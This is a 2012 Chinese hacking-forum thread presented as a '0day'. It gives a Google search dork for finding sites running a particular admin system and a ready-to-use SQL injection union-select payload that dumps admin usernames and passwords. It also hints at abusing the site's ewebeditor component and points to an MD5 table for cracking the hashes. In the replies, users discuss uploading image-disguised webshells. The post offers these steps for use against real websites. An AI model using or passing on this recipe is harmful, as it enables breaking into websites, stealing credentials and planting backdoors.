一枚0day
google关键词inurl:szwyadmin/login.asp
打开网页直接开主页,
点开新闻管理 点开一个ID连接
%20and%201=2%20union%20select%201,2,3,4,user,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20admin
这个语句直接爆账号密码
其中网站根目录下有ewebeditor编辑器,
怎么利用你懂的!
大部分爆出的秘密是MD532位的建议下载我在论坛放的MD5密码表
大侠,为什么上传图片马之后,路径UPLOAD/2012073110354873499.jpg 找不到了?菜鸟学习,帖子很好,谢谢。 dragondoudou 发表于 2012-7-31 11:20 static/image/common/back.gif
大侠,为什么上传图片马之后,路径UPLOAD/2012073110354873499.jpg 找不到了?菜鸟学习,帖子很好,谢谢。 ...
没有备份? {:soso_e179:} 试用下 看管用不。 :lol:lol支持下
页:
[1]